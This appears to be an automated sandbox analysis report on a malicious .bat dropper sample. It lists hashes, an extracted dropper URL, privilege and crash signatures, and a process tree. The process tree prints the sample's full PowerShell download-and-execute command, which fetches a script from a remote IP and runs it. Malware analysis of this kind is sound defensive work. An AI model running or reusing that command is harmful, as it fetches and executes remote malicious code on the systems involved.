Analysis
max time kernel: 130s
max time network: 78s
platform: windows10_x64
resource: win10v200430
submitted: 02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample: 7dd11380f39c84448a7000c280f12a78.bat
Resource: win7v200430 (windows7_x64)
0 signatures
0 seconds
Behavioral task
behavioral2
Sample: 7dd11380f39c84448a7000c280f12a78.bat
Resource: win10v200430 (windows10_x64)
0 signatures
0 seconds
General
Target: 7dd11380f39c84448a7000c280f12a78.bat
Size: 219B
MD5: 694736c7cc588c0f7d4fea15b4f4e074
SHA1: 322715308f98b4e097a6e8eb88c84cd75e6dffa3
SHA256: 45b6d83a99693328a71a689d57f8b722e4e74c34b984569bec15e1108852bebc
SHA512: c93891f9542c5b111d290df367ff1019cc46f5b23f32df4b83989ba23a79215906029cbe2568c45f4226e650d3c55e50dcf6a5dd6fb382721e99f6da47bdd3d8
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: ps1.dropper
URLs: http://185.103.242.78/pastes/7dd11380f39c84448a7000c280f12a78
Signatures

Program crash (1 IoC)
Processes:
  WerFault.exe
  pid   pid_target   process        target process
  2204  2908         WerFault.exe   powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  WerFault.exe
  description                pid   process
  Token: SeRestorePrivilege  2204  WerFault.exe
  Token: SeBackupPrivilege   2204  WerFault.exe
  Token: SeDebugPrivilege    2204  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  WerFault.exe
  pid   process
  2204  WerFault.exe (14 identical entries)
Processes (process tree, child processes indented under their parent)

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7dd11380f39c84448a7000c280f12a78.bat"
   PID: 1916

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/7dd11380f39c84448a7000c280f12a78');Invoke-GLRLIILZKEHV;Start-Sleep -s 10000"
      PID: 2908

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
         PID: 2204